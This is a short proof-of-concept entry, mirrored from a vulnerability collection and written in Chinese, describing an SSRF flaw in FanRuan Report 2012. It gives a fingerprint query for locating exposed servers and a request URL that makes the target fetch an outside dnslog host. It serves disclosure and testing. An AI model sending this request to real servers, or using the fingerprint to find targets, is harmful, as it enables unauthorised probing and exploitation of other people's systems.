admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 20:06:03 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/OA产品漏洞/帆软报表 2012 SSRF漏洞.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

396 B
Raw Blame History

帆软报表 2012 SSRF漏洞

漏洞描述

帆软报表 2012 存在信息泄露漏洞通过访问特定的Url获取造成SSRF

漏洞影响

帆软报表 2012

网络测绘

body="down.download?FM_SYS_ID"

漏洞复现

漏洞验证Url为

/ReportServer?op=resource&resource=0m0m6k.dnslog.cn

image-20220209113126929